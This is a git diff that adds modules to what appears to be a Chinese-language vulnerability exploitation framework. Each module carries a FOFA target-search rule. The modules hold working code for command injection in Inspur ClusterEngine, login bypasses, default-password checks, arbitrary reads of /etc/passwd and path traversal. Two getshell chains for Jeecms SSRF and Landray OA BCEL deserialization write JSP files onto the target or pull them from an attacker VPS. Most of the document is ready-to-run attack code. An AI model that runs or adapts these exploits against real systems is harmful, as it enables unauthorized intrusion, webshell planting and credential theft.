ClusterEngine V4.0 RCE' +FOFA_RULE='title="TSCEV4.0"' +###################################################### + +def poc(target): + result={} + headers={ + 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'X-Requested-With':'XMLHttpRequest', + "User-Agent":ua + } + + data = { + 'op':'testPhone', + 'alarmTestPhone':'1;{}'.format('whoami'), + 'alarmTestMessage':'2' + } + + try: + r = requests.post(target+"/alarmConfig",headers=headers, data=data, verify=False) + res=json.loads(r.text) + if res['def']: + result['target'] = target + result['poc'] = NAME + result['whoami'] = str(res['def']) + return result + except: + pass + + + +def exp(target,cmd): + headers={ + 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'X-Requested-With':'XMLHttpRequest', + "User-Agent":ua + } + + data = { + 'op':'testPhone', + 'alarmTestPhone':'1;{}'.format(cmd), + 'alarmTestMessage':'2' + } + + try: + r = requests.post(target+"/alarmConfig",headers=headers, data=data, verify=False) + res=json.loads(r.text) + print(res['def']) + except: + pass + + + +if __name__ == '__main__': + exp("http://127.0.0.1","whoami") \ No newline at end of file diff --git a/Moudle/Inspur/Inspur_Any_user_login.py b/Moudle/Inspur/Inspur_Any_user_login.py new file mode 100644 index 0000000..e2652c9 --- /dev/null +++ b/Moudle/Inspur/Inspur_Any_user_login.py @@ -0,0 +1,36 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import sys +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='Inspur_Any_user_login' +AUTHOR="Faith" +REMARK='浪潮任意用户登录漏洞' +FOFA_RULE='title="TSCEV4.0"' +###################################################### + +def poc(target): + url = target + "/module/login/login.html" + result = {} + headers = {"User-Agent":ua} + data = "op=login&username=admin|pwd&password=任意" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.post(url,data=data,headers=headers,verify=False,timeout=3) + if r.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['url'] = url + return result + else: + pass + except: + pass + +if __name__ == '__main__': + poc("https://127.0.0.1:8443/") \ No newline at end of file diff --git a/Moudle/Inspur/Inspur_sysShell_RCE.py b/Moudle/Inspur/Inspur_sysShell_RCE.py new file mode 100644 index 0000000..342467c --- /dev/null +++ b/Moudle/Inspur/Inspur_sysShell_RCE.py @@ -0,0 +1,38 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from requests.packages.urllib3.exceptions import InsecurePlatformWarning + + +# 脚本信息 +###################################################### +NAME='Inspur_sysShell_RCE' +AUTHOR="Faith" +REMARK='浪潮ClusterEngineV4.0 sysShell RCE' +FOFA_RULE='title="TSCEV4.0"' +###################################################### + +def poc(target): + result = {} + url = target + "/sysShell" + headers = { + "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", + "Cookie": "lang=cn" + } + data = "op=doPlease&node=cu01&command=cat /etc/passwd" + try: + requests.packages.urllib3.disable_warnings(InsecurePlatformWarning) + r = requests.post(url=url,headers=headers,data=data,verify=False,timeout=3) + if 'root' in r.text and r.status_code ==200: + result['target'] = target + result['poc'] = NAME + result['url'] = url + return result + else: + pass + except: + pass +if __name__ == '__main__': + poc("https://127.0.0.1/") + diff --git a/Moudle/Jeecms/Jeecms_ssrf_getshell.md b/Moudle/Jeecms/Jeecms_ssrf_getshell.md new file mode 100644 index 0000000..efa7020 --- /dev/null +++ b/Moudle/Jeecms/Jeecms_ssrf_getshell.md @@ -0,0 +1,57 @@ +# 1、漏洞描述 + +jeecms V7版本的一个上传组件存在远程拉取图片的功能,并将远程拉取的文件保存在服务器上。但程序没有对远程文件的类型做好过滤,导致可从远程拉取任意格式的文件,可直接getshell。 + +V9版本做了修复,会对远程获取的文件后缀进行校验,并对上传的文件强行重命名。 + +# 2、漏洞复现 + +直接上POST包: + +data数据中远程文件的后缀写为.jsp?.jpg是尝试绕过,虽然这样能上传上去,但是因强行文件重命名,传上去的也是一个图片。可直接尝试不带?.jpg去检查和利用。 + +``` +POST /ueditor/getRemoteImage.jspx HTTP/1.1 +Host: 127.0.0.1 +Content-Length: 453 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: null +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZUxAA9jVG2OHOQYo +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: cross-site +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +------WebKitFormBoundaryZUxAA9jVG2OHOQYo +Content-Disposition: form-data; name="upfile" + +http://vps:port/test1.jsp?.jpg +------WebKitFormBoundaryZUxAA9jVG2OHOQYo +Content-Disposition: form-data; name="mark" + + +------WebKitFormBoundaryZUxAA9jVG2OHOQYo +Content-Disposition: form-data; name="uploadfile"; filename="test1.jsp.jpg" +Content-Type: application/octet-stream + +<%out.println("123");%> +------WebKitFormBoundaryZUxAA9jVG2OHOQYo-- + +``` + +网站返回json格式的包含 远程图片抓取成功 以及url地址则证明存在漏洞 + +# 3、poc + +因SSRF漏洞利用需要从远端获取信息,若要getshell,需要远端存在shell文件,所以poc需要修改poc_content方法中content参数里的url地址。 + +脚本中有个坑,post内容里的回车换行,这里用的\r\n表示的,直接回车换行请求会出问题,导致poc验证失败。 diff --git a/Moudle/Jeecms/Jeecms_ssrf_getshell.py b/Moudle/Jeecms/Jeecms_ssrf_getshell.py new file mode 100644 index 0000000..0eddb9c --- /dev/null +++ b/Moudle/Jeecms/Jeecms_ssrf_getshell.py @@ -0,0 +1,46 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='Jeecms_ssrf_getshell' +AUTHOR="境心" +REMARK='Jeecms ssrf漏洞' +FOFA_RULE='app="JEECMS"' +###################################################### + +def poc_content(): + content = """-----------------------------245629485030790359921083390342\r\nContent-Disposition: form-data; name="upfile"\r\n\r\nhttp://127.0.0.1:9699/test1.jsp\r\n-----------------------------245629485030790359921083390342--""" + return content + +def poc(targrt): + result = {} + url = targrt + "/ueditor/getRemoteImage.jspx" + content = poc_content() + headers = { + "User-Agent":ua, + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept - Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------245629485030790359921083390342", + "Connection": "close" + } + res = requests.post(url, headers=headers, data=content, timeout=5, verify=False) + res = res.text + print(res) + if "srcUrl" in res and "远程图片抓取成功" in res: + result['message'] = res + result['target_url'] = url + return result + +if __name__ == '__main__': + # poc调用 + poc("https://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Kangle/Kangle_Console_default_password.py b/Moudle/Kangle/Kangle_Console_default_password.py new file mode 100644 index 0000000..feef1da --- /dev/null +++ b/Moudle/Kangle/Kangle_Console_default_password.py @@ -0,0 +1,44 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import ua + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME = 'Kangle_Console_default_password' +AUTHOR = "RabbitMask" +REMARK = 'kangle Console default password' +FOFA_RULE = 'app="kangle-easypanel"' +###################################################### + +def poc(target): + result={} + headers = { + "User-Agent": ua, + 'Content-Type': 'application/x-www-form-urlencoded', + } + + data = { + "username": "admin", + "passwd": "kangle", + } + + try: + r = requests.post(target + "/admin/index.php?c=session&a=login", headers=headers, data=data, verify=False, timeout=5,allow_redirects=False) + if r.status_code==302: + result['target'] = target + result['poc'] = NAME + result['url'] = target+'/admin/index.php?c=session&a=login' + result['username'] = 'admin' + result['password'] = 'kangle' + return result + except: + pass + + + +if __name__ == '__main__': + poc("http://127.0.0.1:3312") diff --git a/Moudle/Landray/Landray_OA_anyfile_read.py b/Moudle/Landray/Landray_OA_anyfile_read.py new file mode 100644 index 0000000..24502dc --- /dev/null +++ b/Moudle/Landray/Landray_OA_anyfile_read.py @@ -0,0 +1,37 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + + +######################################################################################################################## +# 脚本信息 +NAME='Landray_OA_anyfile_read' +AUTHOR="Faith" +REMARK='蓝凌OA custom.jsp 任意文件读取漏洞' +FOFA_RULE='app="Landray-OA系统"' +######################################################################################################################## + +def poc(target): + result={} + url = target + "/sys/ui/extend/varkind/custom.jsp" + data = 'var={"body":{"file":"file:///etc/passwd"}}' + # data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}' + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.post(url=url,headers=headers,data=data,verify=False,timeout=3) + if r.status_code == 200 and "root:x:0" in r.text: + result["target"] = target + result["poc"] = NAME + result["url"] = url + return result + else: + pass + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1/") + diff --git a/Moudle/Landray/Landray_OA_xmldecoder_getshell.md b/Moudle/Landray/Landray_OA_xmldecoder_getshell.md new file mode 100644 index 0000000..98747e4 --- /dev/null +++ b/Moudle/Landray/Landray_OA_xmldecoder_getshell.md @@ -0,0 +1,114 @@ +# 1、漏洞描述 + +蓝凌OA部分版本存在漏洞,前台即可实现RCE命令执行,直接getshell。 + +# 2、漏洞复现 + +# 2.1、生成payload + +需要运行两段java代码,生成payload。 + +FastJsonEchoBCEL.java + +更改shell变量的内容即可,将exp BASE64加密后替换(这里jdk要用低版本,否则无法导入BASE64Decoder包,貌似用jdk1.7、jdk1.8均可); + +```java +import java.io.PrintWriter; +import sun.misc.BASE64Decoder; + +public class FastJsonEchoBCEL { + public FastJsonEchoBCEL() throws Exception { + } + + public static void main(String[] args) throws Exception { + new FastJsonEchoBCEL(); + } + + static { + try { + Class cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter"); + String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath(); + PrintWriter printWriter2 = new PrintWriter(path.split("WEB-INF")[0] + "login_test.jsp"); + String shell = "PCVvdXQucHJpbnRsbigidGhpcyBpcyBhIGZyaWVuZGx5IHRlc3QsIFBsZWFzZSBjaGVjayBhbmQgcmVwYWlyIHZ1bG5lcmFiaWxpdGllcy4iKTslPg=="; + BASE64Decoder decoder = new BASE64Decoder(); + String decodeString = new String(decoder.decodeBuffer(shell), "UTF-8"); + printWriter2.println(decodeString); + printWriter2.close(); + } catch (Exception var5) { + } + + } +} +``` + +main.java + +这里需要使用maven导入org.apache.bcel包,具体方法见下面; + +``` +import org.apache.bcel.Repository; +import org.apache.bcel.classfile.JavaClass; +import org.apache.bcel.classfile.Utility; +import java.io.IOException; + +public class main { + + public static void main(String[] args) throws ClassNotFoundException, IOException { + JavaClass javaClass = Repository.lookupClass(FastJsonEchoBCEL.class); + String codes = Utility.encode(javaClass.getBytes(), true); + System.out.println("$$BCEL$$"+codes); + + } + +} +``` + +关于这两段代码如何运行,建议使用idea软件。本地新建一个文件夹,右键以idea的project方式打开。 + +在idea软件中,右键该名称的项目文件夹,新建-->新模块,选择Maven,点下一步,点完成创建成功。 + +将上面两端代码复制到本地文件中,文件名要与上面写的一样,然后两个文件复制到创建的src/main/java目录下。 + +打开pom.xml,将如下内容复制到文件中 + +``` + + + + org.apache.bcel + bcel + 5.2 + + +``` + +![](image-20210913144734740.png) + +文件-->项目结构-->项目中,选择相应的jdk版本,然后执行main.java即可得到payload。 + +# 2.2、漏洞验证 + +POST: + +将如上得到的payload替换下面标签内的内容即可。 + +``` +POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 +Host: 127.0.0.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Length: 2907 + +var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$dbV$dbF$U$dd$D62B$E0$98KHI$934$N$Q$c0$N$974$e5$da$d8$60c0$E0$d8$b1iKeY$d8rdI$95d$Ci$ff$a7$cfy1$5de$ad$7e$40$7f$a8o$5d$3d$psu$dd$8b$d7$d2$5c$ce$ec$d9$3ag$9f$99$p$ff$fe$e7$af$bf$B$98$c5O$o$kbA$c0$a2$88$W$y$88X$c22oV$C$f8Z$c4kDDD$b1$wb$N1$Rq$ac$8bH$60C$c0$a6$80$a4$88N$y$E$b0$rb$Q$db$7c$f2$s$80$j$de$ef$8a$90$b0$X$40J$c0$be$88$7e$ce$7e$c0$fbt$A$Z$O$7e$cb$d7$b3$bc$c9$J8$U$f0$NC$db$a2fh$ee2C$eb$e8X$9a$c1$X5$L$wCWR3$d4$edj$r$af$da$fbr$5e$tK0i$w$b2$9e$96m$8d$cf$_$8d$3e$b7$a49$MO$93$8e$ad$84$x$b2f$84$cb$f2$89$ivU$c7$N$c7d$c7$ddpLcM$v$99$91$e8Zr$81A$5c$3bUT$cb$d5L$836$f98$9e$a1$7f$f40$e9m$d2e$a3$YN$b9$b6f$U$X$3cOd$bbH$b0$de$s$cb$M$81EE$bf$f2$5b$d1$J$d6s$L$V$d5e$c7$n$90$cf$92$dd$S$f7$bc$J$81d$d1$c0$cd$d8$9a$ab$da$d3$M$a1$3aF3$c3$3b7v$82$f9$9d$92$aa$eb$MBAUH$Y$9ba0$e9T$8dpEs$94p$e4uj$ed$e5$ecj$7d$85s$d6A$f5w0t$a6$5cYy$b7$r$5b$9eX$a47$J$902$ab$b6$a2$c64$$$5e$a8Q$a1$v$ee$83$84O$f1$88$e1$c9$ffPT$c0$b7$S$be$c3$91$84$ef$nS$ce$f2Ni$wa$90$e3$96$adR$x$m$_AAA$80$w$e1$YE$B$r$J$g$ca$C$deI$d0Q$R$60H0a$91$c6M$82g$Yh$94$zR$d5tO$D$n$b3$W$99Ll$c7$q$fc$A$5b$82$D$97$e1$9en$W5$e3H$d7$iw$aa$ecX$S$aa$b0x$y$t$M$eeN4$7dRx$bb$5bU$d67$ac$bc$b1$e7$e4$b5$a2V$88$97$y$e5$y$c2$9fR$o$9e$3b$933$e9j$$$7e$3a$97X$df$d3$95$99$5d$t$R$8b8$b9L$ecC$$$V$v$cb$f1tY$s$5c$be$b2$5bT$w$e9$f7$d9$8c$7e$96X$cf$bd$c8$c7$e7t$a5$S$d3$e4$cc$a9U$88$eb$bar6$abm$ee$3b$faNqi$89NV$f3D1t7$G$s$e1$3dN$v$d9$H$fb$b1$c9W$dc$e93$J$lp$o$e1G$9e$8a$de$h$f8$f5$f9$bdC$f2$s_V$V$f7$8ei$bfd$abr$81$ce$80R$b5m$d5p$af$e6$7d$a3c$c9F$U$9d$9cPQu$a3$s$a5$ee$d4$f5$Oo$d2$94$3dO$87$ee$c0o$z$f1$3dM$X$Y$dau$gx$W$ba$98$a3M$eeV$93$9b$d2$d5$60$a2$a0$c9$a3$j$dbt$v0$Kw$d5$ac_$d6$c7W$fe8$w$F$a6$b9g$e1F$M$91$8d$fc$3b$82D$f1$a2$a5$8b$e2$5d$G$86$H$7fc$bdY$r$be$c1$7fZc$e8$m$s$5e$97$$Sr$c5c$a8n$f8$60$8fW$i$e9$f6$9c$O$$$8f$ca$x$Kw$Tq$5d$W$fc$8e$a5k$94$cag$cd$84kZ$89$dad$cbR$NJ$ed$e4$7fh$7d$e7$O$f1$S$e6$9aW$95$o$d4lk$fa$ba$a0D$aa$c7$c7$3c$b3$fdM$9d$8a$d0M$j$3d$8c4g$Q$bc2$a7$938$7eE7$j$V$8f$e8$5b$f3$Q$fc$d7$K$c6K$N$cd$l$d3l$86f$8cz$ff$f89$d8G$g$b4$e0$J$b5$fc$d3$E$I$f0$n$80$cfh$q$d5Ax$8a$cf$a9$7fF$8f$8f$y$ph$c7$u$c6$$$a9$be$a4$9e$a3$da$_$d0$92$3dGk$a6$91$ae$83$c8$a4$5bt$ed$Y$c7$f3$3bt$BL$90g$8c$d3$b1Vz$5d$h$ad$94$7e$81$af$G$7f$b0$ad$Gas$bc$86$40$N$ed5$885t$q$_$me$_$d0I$_$bb$f7$3c$d8UCw$ebt$N$3d$c1$m55$f4$9e$a3o$x$Y$da$be$40$3f$B$G$e6$7d$X$Y$cc$O$f9$sk$Y$K$de$3f$c7$f0$bc$7fb$c8_$c3$83$89$g$3e$f9$Z$be$cd$8f$9eO$KU$cc$R$d2$88$7b$3dE$k$D$dd$e4m$P$ee$p$88E$f4b$F$7dXG$IY$fa$ba$ka$80$f0C$b4c$QE$M$7b$91$z$93$cf$S2$98$a4$dd$a0$5d$J$84$f1$F1$_R$94$_0M$3a$ac$Qn$86l$ad$c43L$7f$H$e6$u$f6$y$v$f4$92l$7e$S$91$eb$d2$f2$H$8e$F$bc$o$V$f0$95$t$e2$fc_$3f$bb$d2$b6$3e$I$A$A +``` + +# 3、poc + +payload需要手工单独生成。 + +poc配合框架可批量。 \ No newline at end of file diff --git a/Moudle/Landray/Landray_OA_xmldecoder_getshell.py b/Moudle/Landray/Landray_OA_xmldecoder_getshell.py new file mode 100644 index 0000000..3c2ec91 --- /dev/null +++ b/Moudle/Landray/Landray_OA_xmldecoder_getshell.py @@ -0,0 +1,42 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# 脚本信息 +###################################################### +NAME='Landray_OA_xmldecoder_getshell' +AUTHOR="境心" +REMARK='蓝凌OA xmldecoder 反序列化漏洞' +FOFA_RULE='app="Landray-OA系统"' +###################################################### + + +def poc(target): + result = {} + target_url = target+"/sys/ui/extend/varkind/custom.jsp" + headers = { + "User-Agent": ua, + "Accept": "text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-cn", + "Accept-Encoding": "gzip, deflate", "Origin": "null", "Connection": "close", "Upgrade-Insecure-Requests": "1", + "Content-Type": "application/x-www-form-urlencoded" + } + data = {"var": "{\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do?method=editParam\"}}", + "fdParemNames": "11", + "fdParameters": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$dbV$dbF$U$dd$D62B$E0$98KHI$934$N$Q$c0$N$974$e5$da$d8$60c0$E0$d8$b1iKeY$d8rdI$95d$Ci$ff$a7$cfy1$5de$ad$7e$40$7f$a8o$5d$3d$psu$dd$8b$d7$d2$5c$ce$ec$d9$3ag$9f$99$p$ff$fe$e7$af$bf$B$98$c5O$o$kbA$c0$a2$88$W$y$88X$c22oV$C$f8Z$c4kDDD$b1$wb$N1$Rq$ac$8bH$60C$c0$a6$80$a4$88N$y$E$b0$rb$Q$db$7c$f2$s$80$j$de$ef$8a$90$b0$X$40J$c0$be$88$7e$ce$7e$c0$fbt$A$Z$O$7e$cb$d7$b3$bc$c9$J8$U$f0$NC$db$a2fh$ee2C$eb$e8X$9a$c1$X5$L$wCWR3$d4$edj$r$af$da$fbr$5e$tK0i$w$b2$9e$96m$8d$cf$_$8d$3e$b7$a49$MO$93$8e$ad$84$x$b2f$84$cb$f2$89$ivU$c7$N$c7d$c7$ddpLcM$v$99$91$e8Zr$81A$5c$3bUT$cb$d5L$836$f98$9e$a1$7f$f40$e9m$d2e$a3$YN$b9$b6f$U$X$3cOd$bbH$b0$de$s$cb$M$81EE$bf$f2$5b$d1$J$d6s$L$V$d5e$c7$n$90$cf$92$dd$S$f7$bc$J$81d$d1$c0$cd$d8$9a$ab$da$d3$M$a1$3aF3$c3$3b7v$82$f9$9d$92$aa$eb$MBAUH$Y$9ba0$e9T$8dpEs$94p$e4uj$ed$e5$ecj$7d$85s$d6A$f5w0t$a6$5cYy$b7$r$5b$9eX$a47$J$902$ab$b6$a2$c64$$$5e$a8Q$a1$v$ee$83$84O$f1$88$e1$c9$ffPT$c0$b7$S$be$c3$91$84$ef$nS$ce$f2Ni$wa$90$e3$96$adR$x$m$_AAA$80$w$e1$YE$B$r$J$g$ca$C$deI$d0Q$R$60H0a$91$c6M$82g$Yh$94$zR$d5tO$D$n$b3$W$99Ll$c7$q$fc$A$5b$82$D$97$e1$9en$W5$e3$88$3b$3aUv$y$JUX$3c$96$T$Gw$t$9a$3e$v$bc$dd$ad$w$eb$hV$de$d8s$f2ZQ$x$c4K$96r$W$e1O$v$R$cf$9d$c9$99t5$X$3f$9dK$ac$ef$e9$ca$cc$ae$93$88E$9c$5c$s$f6$n$97$8a$94$e5x$ba$y$T$$_$d9$z$w$95$f4$fblF$3fK$ac$e7$5e$e4$e3s$baR$89ir$e6$d4$w$c4u$5d9$9b$d56$f7$j$7d$a7$b8$b4D$t$aby$a2$Y$ba$h$D$93$f0$k$a7$94$ec$83$fd$d8$e4$x$ee$f4$99$84$P8$91$f0$pOE$ef$N$fc$fa$fc$de$ny$93$_$ab$8a$7b$c7$b4_$b2U$b9$40g$40$a9$da$b6j$b8W$f3$be$d1$b1d$p$8aNN$a8$a8$baQ$93Rw$eaz$877i$ca$9e$a7Cw$e0$b7$96$f8$9e$a6$L$M$ed$3a$N$3c$L$5d$cc$d1$sw$ab$c9M$e9j0Q$d0$e4$d1$8em$ba$U$Y$85$bbj$d6$_$eb$e3$x$7f$i$95$C$d3$dc$b3p$p$86$c8F$fe$jA$a2x$d1$d2E$f1$$$D$c3$83$bf$b1$de$ac$S$df$e0$3f$ad1t$Q$T$afK$97$v$b9$e21T7$7c$b0$c7$x$8et$7bN$H$97G$e5$V$85$bb$89$b8$$$L$7e$c7$d25J$e5$b3f$c25$adDm$b2e$a9$G$a5v$f2$3f$b4$bes$87x$Js$cd$abJ$Rj$b65$7d$5dP$o$d5$e3c$9e$d9$fe$a6NE$e8$a6$8e$kF$9a3$I$5e$99$d3I$i$bf$a2$9b$8e$8aG$f4$ady$I$fek$F$e3$a5$86$e6$8fi6C3F$bd$7f$fc$i$ec$p$NZ$f0$84Z$fei$C$E$f8$Q$c0g4$92$ea$m$3c$c5$e7$d4$3f$a3$c7G$96$R$b4c$Uc$97T_R$cfQ$ed$Xh$c9$9e$a35$d3H$d7Ad$d2$z$bav$8c$e3$f9$j$ba$A$s$c83$c6$e9X$x$bd$ae$8dVJ$bf$c0W$83$3f$d8V$83$b09$5eC$a0$86$f6$g$c4$g$3a$92$X$90$b2$X$e8$a4$97$dd$7b$k$ec$aa$a1$bbu$ba$86$9e$60$90$9a$gz$cf$d1$b7$V$Mm_$a0$9f$A$D$f3$be$L$Mf$87$7c$935$M$F$ef$9fcx$de$3f1$e4$af$e1$c1D$N$9f$fc$M$df$e6G$cf$t$85$w$e6$Ii$c4$bd$9e$o$8f$81n$f2$b6$H$f7$R$c4$oz$b1$82$3e$ac$p$84$y$7d$5d$8f0$40$f8$n$da1$88$o$86$bd$c8$96$c9g$J$ZL$d2n$d0$ae$E$c2$f8$82$98$X$v$ca$X$98$s$jV$I7C$b6V$e2$Z$a6$bf$Ds$U$7b$96$UzI6$3f$89$c8ui$f9$D$c7$C$5e$91$K$f8$ca$Tq$fe$_$99$bd$a4$e2$3e$I$A$A\r\n"} + requests.post(target_url, headers=headers, data=data, timeout=5, verify=False) + poc_url = target+"/login_test.jsp" + res = requests.get(poc_url, timeout=5, verify=False) + + if res.status_code == 200 and "this is a friendly test" in res.text: + result['poc'] = NAME + result['poc_url'] = poc_url + return result + + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Landray/image-20210913144734740.png b/Moudle/Landray/image-20210913144734740.png new file mode 100644 index 0000000..e100df0 Binary files /dev/null and b/Moudle/Landray/image-20210913144734740.png differ diff --git a/Moudle/Lanproxy/CVE_2021_3019.py b/Moudle/Lanproxy/CVE_2021_3019.py new file mode 100644 index 0000000..1d4d683 --- /dev/null +++ b/Moudle/Lanproxy/CVE_2021_3019.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CVE-2021-3019' +AUTHOR="Joker" +REMARK='Lanproxy 目录遍历漏洞 ' +FOFA_RULE='header= "Server: LPS-0.1"' +###################################################### + +def poc(target): + result={} + vuln_url = target + "/..%2Fconf/config.properties" + + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", + "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6", + "Upgrade-Insecure-Requests": "1" + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + if "config.server" in r.text and r.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['data'] = str(r.text) + return result + else: + pass + except Exception as e: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Moudle_index.py b/Moudle/Moudle_index.py new file mode 100644 index 0000000..3fba909 --- /dev/null +++ b/Moudle/Moudle_index.py @@ -0,0 +1,110 @@ +MOUDLE_NUM=26 +PAYLOAD_NUM=55 + +# AlibabaCanal +from Moudle.AlibabaCanal import Alibaba_Canal_Info_Leak + +# Apache +from Moudle.Apache import CVE_2021_41773 + +# Confluence +from Moudle.Confluence import CVE_2021_26084 + +# Demo +from Moudle.Demo import Demo +from Moudle.Demo import Test + +# Discuz +from Moudle.Discuz import discuz_version_change_getshell + +# Drupal +from Moudle.Drupal import CVE_2018_7600 + +# ESAFENET +from Moudle.ESAFENET import CNVD_2021_26058 + +# EyouCMS +from Moudle.EyouCMS import EyouCMS_qiantai_rce + +# F5 +from Moudle.F5 import CVE_2020_5902 +from Moudle.F5 import CVE_2021_22986 + +# Fikker +from Moudle.Fikker import Fikker_admin + +# Inspur +from Moudle.Inspur import Inspur_Any_user_login +from Moudle.Inspur import CVE_2020_21224 +from Moudle.Inspur import Inspur_sysShell_RCE + +# Jeecms +from Moudle.Jeecms import Jeecms_ssrf_getshell + +# Kangle +from Moudle.Kangle import Kangle_Console_default_password + +# Landray +from Moudle.Landray import Landray_OA_anyfile_read +from Moudle.Landray import Landray_OA_xmldecoder_getshell + +# Lanproxy +from Moudle.Lanproxy import CVE_2021_3019 + +# Nexus +from Moudle.Nexus import CVE_2019_7238 + +# Seeyon +from Moudle.Seeyon import CNVD_2019_19299 +from Moudle.Seeyon import CNVD_2020_62422 +from Moudle.Seeyon import CNVD_2021_01627 +from Moudle.Seeyon import Information_seeyou +from Moudle.Seeyon import Seeyon_OA_SessionLeak_Upload +from Moudle.Seeyon import Seeyon_OA_Session_Leak +from Moudle.Seeyon import Seeyon_OA_SQLInjection + +# SonarQube +from Moudle.SonarQube import CVE_2020_27986 + +# Spring +from Moudle.Spring import CVE_2022_22947 + +# TDXK +from Moudle.TDXK import TDXK_Any_file_upload +from Moudle.TDXK import TDXK_Any_user_login +from Moudle.TDXK import TDXK_logined_any_file_upload +from Moudle.TDXK import TDXK_online_user_login +from Moudle.TDXK import TDXK_weakpwd + +# TianQing +from Moudle.TianQing import TianQing_SQLinjection +from Moudle.TianQing import TianQing_Unauthorized + +# VCenter +from Moudle.VCenter import CVE_2021_21972 +from Moudle.VCenter import CVE_2021_22005 + +# VRealize +from Moudle.VRealize import CVE_2021_21975 +from Moudle.VRealize import CVE_2021_21983 + +# Weaver +from Moudle.Weaver import CNVD_2019_32204 +from Moudle.Weaver import Weaver_e_Bridge_file_read +from Moudle.Weaver import Weaver_e_Cology_RCE +from Moudle.Weaver import Weaver_e_cology_v9_file_upload +from Moudle.Weaver import Weaver_OA_V8_sqlinjection + +# Weblogic +from Moudle.Weblogic import CVE_2014_4210 +from Moudle.Weblogic import CVE_2017_10271 +from Moudle.Weblogic import CVE_2018_2894 +from Moudle.Weblogic import CVE_2019_2725 +from Moudle.Weblogic import CVE_2020_16882 +from Moudle.Weblogic import CVE_2021_2109 +from Moudle.Weblogic import Weblogic_Console_Info_Leak + +# Zabbix +from Moudle.Zabbix import CVE_2016_10134 +from Moudle.Zabbix import Zabbix_Console_default_password + diff --git a/Moudle/Nexus/CVE_2019_7238.py b/Moudle/Nexus/CVE_2019_7238.py new file mode 100644 index 0000000..64e5d49 --- /dev/null +++ b/Moudle/Nexus/CVE_2019_7238.py @@ -0,0 +1,69 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 + +requests.packages.urllib3.disable_warnings() + + +# 脚本信息 +###################################################### +NAME='CVE-2019-7238' 